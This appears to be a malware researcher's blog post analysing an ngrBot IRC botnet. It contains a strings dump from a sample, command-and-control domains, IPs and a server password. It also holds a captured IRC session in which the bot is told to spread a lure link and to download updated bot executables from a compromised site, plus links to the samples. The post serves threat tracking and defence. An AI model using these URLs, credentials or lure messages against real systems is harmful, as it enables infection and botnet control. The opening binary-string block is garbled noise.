9$:0:Q:
:&;2;8;F;
<"<2<=<Q<W<i<
=$=*=4=:=E=K=S=e=
>;>I>
?!?F?M?W?
1$1<1I1[1g1
2%2>2V2a2t2|2
373E3M3a3l3
3@4N4U4
5/565<5R5k5
666i6
7.7M7
8,818M8[8`8
8?9R9
:#:4:9:?:E:P:{:
;#;B;U;[;b;r;
<!<o<
=$=;=C=N=S=X=i=n=s=}=
>">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|>
?B?H?N?T?Z?`?f?l?r?x?~?
4 4$4(4,4044484<4@4D4H4L4P4T4X66`6h6l6p6t6x6|6
7D7L7X77`7d7h7l7p7t7
9(949@9L9X9d9p9|9
:$:0:<:H:T:`:l:x:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;;`;d;h;
4 4$4(4,4044484<4@4D4H4L4P4T4X44`4d4h4l4p4t4x4|4
5 5$5(5,5054585<5@5D5H5L5P5T5X55`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X66`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X77`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X88`8d8h8l8p8t8x8|8
8 9,989D9P99h9x9|9
: :(:,:0:8:<:@:X:`:d:h:l:p:x:|:
; ;$;(;,;0;8;<;@;D;H;P;T;X;;`;h;l;p;t;x;
< <(<,<0<4<8<@<D<H<L<P<X<<`<d<h<p<t<|<
=(=0=8=@=H=T==d=l=

Unicode Strings:
---------------------------------------------------------------------------
Ajjj
jjjj
jjjj
jjjj
$jjj
Ajjj
DBWIN
.pipe
kernel32.dll
ntdll.dll
Internet Exploreriexplore.exe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.ex
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
HKCU
HKLM
Microsoft Unified Security Protocol Provider
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
POST
.exe
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%SDesktop.ini
winlogon.exe
explorer.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
dnsapi.dll
Akernel23.dll
y%s%s.exe
lsass.exe
Shell
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun

we have 2 new domains here

rlz01jm.info not active yet
rlz1lola.info active
lalorlz1.info this is old domain allready posted in my blog

Resolved : [rlz1lola.info] To [176.9.192.215]

176.9.192.216 5236 PASS ROCKR Botnet server here
176.9.192.215 5236 PASS ROCKR Botnet server here

PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita |”
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita”
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected 16 domain(s)
PRIVMSG #ROCK :[d=”http://www.endenter.com/wp-includes/css/update/30upjmrlzz.exe” s=”116236 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0
NICK n{US|XPa}eovvenu
USER eovvenu 0 0 :eovvenu
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to “4”
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to “4”

Now talking in #ROCK
Topic On: [ #ROCK ] [ ,up http://www.endenter.com/wp-includes/css/update/31upjmrlzz.exe 9702091B21C1A48955A5268D07E31EF6 | ,mdns http://www.endenter.com/wp-includes/css/update/dos.txt ]
Topic By: [ rockstar ]

Download samples here and here
Download

hosting infos
http://whois.domaintools.com/176.9.192.215

Categories: Uncategorized